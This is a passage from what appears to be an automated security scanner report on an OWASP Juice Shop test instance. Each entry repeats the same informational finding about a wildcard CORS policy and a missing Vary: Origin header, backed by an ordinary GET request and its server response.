
    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/angular-translate-loader-static-files/angular-translate-loader-static-files.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:17:40 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.79. http://192.168.61.143:3000/public/images/products/bower_components/angular-translate/angular-translate.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/angular-translate/angular-translate.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/angular-translate/angular-translate.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:17:31 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.80. http://192.168.61.143:3000/public/images/products/bower_components/angular/angular.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/angular/angular.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/angular/angular.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:16:20 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.81. http://192.168.61.143:3000/public/images/products/bower_components/bootstrap/dist/js/bootstrap.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/bootstrap/dist/js/bootstrap.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/bootstrap/dist/js/bootstrap.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:17:53 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.82. http://192.168.61.143:3000/public/images/products/bower_components/bootswatch/slate/bootstrap.min.css
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/bootswatch/slate/bootstrap.min.css

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/bootswatch/slate/bootstrap.min.css HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:17:59 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.83. http://192.168.61.143:3000/public/images/products/bower_components/clipboard/dist/clipboard.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/clipboard/dist/clipboard.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/clipboard/dist/clipboard.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:18:01 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.84. http://192.168.61.143:3000/public/images/products/bower_components/flag-icon-css/css/flag-icon.min.css
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/flag-icon-css/css/flag-icon.min.css

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/flag-icon-css/css/flag-icon.min.css HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:18:11 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.85. http://192.168.61.143:3000/public/images/products/bower_components/fontawesome/css/font-awesome.min.css
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/fontawesome/css/font-awesome.min.css

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/fontawesome/css/font-awesome.min.css HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:18:29 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.86. http://192.168.61.143:3000/public/images/products/bower_components/github-fork-ribbon-css/gh-fork-ribbon.css
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/github-fork-ribbon-css/gh-fork-ribbon.css

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/github-fork-ribbon-css/gh-fork-ribbon.css HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:18:37 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.87. http://192.168.61.143:3000/public/images/products/bower_components/github-fork-ribbon-css/gh-fork-ribbon.ie.css
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/github-fork-ribbon-css/gh-fork-ribbon.ie.css

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/github-fork-ribbon-css/gh-fork-ribbon.ie.css HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:18:38 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.88. http://192.168.61.143:3000/public/images/products/bower_components/jquery/dist/jquery.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/jquery/dist/jquery.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/jquery/dist/jquery.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:18:50 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.89. http://192.168.61.143:3000/public/images/products/bower_components/moment/min/moment.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/moment/min/moment.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/moment/min/moment.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:19:03 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.90. http://192.168.61.143:3000/public/images/products/bower_components/ng-file-upload/ng-file-upload-shim.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/ng-file-upload/ng-file-upload-shim.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/ng-file-upload/ng-file-upload-shim.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:19:09 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.91. http://192.168.61.143:3000/public/images/products/bower_components/ng-file-upload/ng-file-upload.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/ng-file-upload/ng-file-upload.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/ng-file-upload/ng-file-upload.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:19:10 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.92. http://192.168.61.143:3000/public/images/products/bower_components/ngclipboard/dist/ngclipboard.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/ngclipboard/dist/ngclipboard.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/ngclipboard/dist/ngclipboard.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:19:19 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.93. http://192.168.61.143:3000/public/images/products/bower_components/qrcode-generator/js/qrcode.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/qrcode-generator/js/qrcode.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/qrcode-generator/js/qrcode.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:19:35 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.94. http://192.168.61.143:3000/public/images/products/bower_components/string/dist/string.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/string/dist/string.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/string/dist/string.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:19:40 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.95. http://192.168.61.143:3000/public/images/products/bower_components/underscore/underscore.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/underscore/underscore.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/underscore/underscore.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:19:41 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.96. http://192.168.61.143:3000/public/images/products/css/app.css
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/css/app.css

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/css/app.css HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:19:52 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.97. http://192.168.61.143:3000/public/images/products/dist/juice-shop.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
